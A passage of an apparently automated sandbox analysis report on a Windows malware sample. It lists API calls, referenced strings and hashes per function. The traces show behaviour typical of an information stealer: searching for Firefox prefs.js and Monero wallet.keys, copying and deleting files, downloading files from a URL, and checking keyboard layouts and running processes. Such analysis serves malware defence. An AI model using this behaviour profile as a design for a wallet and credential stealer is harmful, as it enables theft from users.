FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C015B8,00C00D96), ref: 00BEF71E
StrCmpCA.SHLWAPI(?,00C015BC), ref: 00BEF76F
StrCmpCA.SHLWAPI(?,00C015C0), ref: 00BEF785
FindNextFileA.KERNELBASE(000000FF,?), ref: 00BEFAB1
FindClose.KERNEL32(000000FF), ref: 00BEFAC3

Strings

prefs.js, xrefs: 00BEF812

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 6d4ac0bcf1a58584e445c31debd6aec39a7c27962d9a24cfd242d4792a825a9b
Instruction ID: b5dc9554c3a8834fa14734cf4c14902bd55186f0378dce4b475ac0e0619e8032
Opcode Fuzzy Hash: 6d4ac0bcf1a58584e445c31debd6aec39a7c27962d9a24cfd242d4792a825a9b
Instruction Fuzzy Hash: 0DB12FB19001099BDB28FF64DC95AFD73B9AB54300F4085E8A50EA7195EF706B4DCB92

Function 00BE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C0510C,?,?,?,00C051B4,?,?,00000000,?,00000000), ref: 00BE1923
StrCmpCA.SHLWAPI(?,00C0525C), ref: 00BE1973
StrCmpCA.SHLWAPI(?,00C05304), ref: 00BE1989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BE1D40
DeleteFileA.KERNEL32(00000000), ref: 00BE1DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00BE1E20
FindClose.KERNEL32(000000FF), ref: 00BE1E32

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Strings

\*.*, xrefs: 00BE17F1

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 45bfeb496718047300b5a5424452a81685018fd732161edcd01fbe916dfff27a
Instruction ID: c2bbbd95400a62c3b16272e3a259572d0ec4879f891ae09dd763d6010cc66848
Opcode Fuzzy Hash: 45bfeb496718047300b5a5424452a81685018fd732161edcd01fbe916dfff27a
Instruction Fuzzy Hash: DB12DCB191011C9BDB19EB64CC96AFE73B8AF54340F5085E9A60A63091EF706F8DCF91

Function 00BEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C014B0,00C00C2A), ref: 00BEDAEB
StrCmpCA.SHLWAPI(?,00C014B4), ref: 00BEDB33
StrCmpCA.SHLWAPI(?,00C014B8), ref: 00BEDB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 00BEDDCC
FindClose.KERNEL32(000000FF), ref: 00BEDDDE

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: c4b1a12563c28c5477db32afa22543bb32d07e58e996c176b924c21c112c3a40
Instruction ID: 293fb31aed8362523b185f9a7f12ae999fb4efb35bece5f59496f1de9ae2f1f2
Opcode Fuzzy Hash: c4b1a12563c28c5477db32afa22543bb32d07e58e996c176b924c21c112c3a40
Instruction Fuzzy Hash: FD9158B29001089BCB18FB75DC56DFD73BDAB84340F4085A8B90A97191EF74AB0DCB92

Function 00BE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849

InternetOpenA.WININET(00C00DF7,00000001,00000000,00000000,00000000), ref: 00BE610F
StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BE618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BE61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 00BE61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BE620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00BE6249
InternetCloseHandle.WININET(?), ref: 00BE6253
InternetCloseHandle.WININET(00000000), ref: 00BE6260

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 973ab3bdd632797dbd5a9a51e82039823a0b9d25b2168a3f8d064ad9a227d544
Instruction ID: 1511cbe1ff928f01292a04aa87ea47b10a77ee7574c20b042f731ecf04ff2236
Opcode Fuzzy Hash: 973ab3bdd632797dbd5a9a51e82039823a0b9d25b2168a3f8d064ad9a227d544
Instruction Fuzzy Hash: D7516EB1900218AFDB24DF51DC45BEE77B8EB04741F1080E8A709B71C0DBB46A8ACF96

Function 00BF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

GetKeyboardLayoutList.USER32(00000000,00000000,00C005AF), ref: 00BF7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00BF7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00BF7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BF7C62
LocalFree.KERNEL32(00000000), ref: 00BF7D22

Strings

/ , xrefs: 00BF7C7F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 297aaaee700b41391b206842952f2f08235e3348e2dc04da71af531786a11c03
Instruction ID: 5edd0bcf4c2ba24a3b439fa6b2ff6cde1557bcfcf3422b6156e2fdee749e051b
Opcode Fuzzy Hash: 297aaaee700b41391b206842952f2f08235e3348e2dc04da71af531786a11c03
Instruction Fuzzy Hash: DF410AB194011CABDB28DB54DC99BFDB3B4EB44700F2041D9E60967191DB742F89CFA1

Function 00BEE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C00D73), ref: 00BEE4A2
StrCmpCA.SHLWAPI(?,00C014F8), ref: 00BEE4F2
StrCmpCA.SHLWAPI(?,00C014FC), ref: 00BEE508
FindNextFileA.KERNEL32(000000FF,?), ref: 00BEEBDF

Strings

\*.*, xrefs: 00BEE44D

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 58c30e73c207eb9a12503b81c1cde299104251fa331fa224c46624bdb9710ed0
Instruction ID: e5282ca2a26bb06248ff7717e751b3e43e4e8919800bb839c40c4a24b1370731
Opcode Fuzzy Hash: 58c30e73c207eb9a12503b81c1cde299104251fa331fa224c46624bdb9710ed0
Instruction Fuzzy Hash: 5312FBB191011C9ADB18FB64DC96EFD73B8AB54340F4085E9A60EA7091EF706F4DCB92

Function 00BF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BF961E
Process32First.KERNEL32(00C00ACA,00000128), ref: 00BF9632
Process32Next.KERNEL32(00C00ACA,00000128), ref: 00BF9647
StrCmpCA.SHLWAPI(?,00000000), ref: 00BF965C
CloseHandle.KERNEL32(00C00ACA), ref: 00BF967A

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
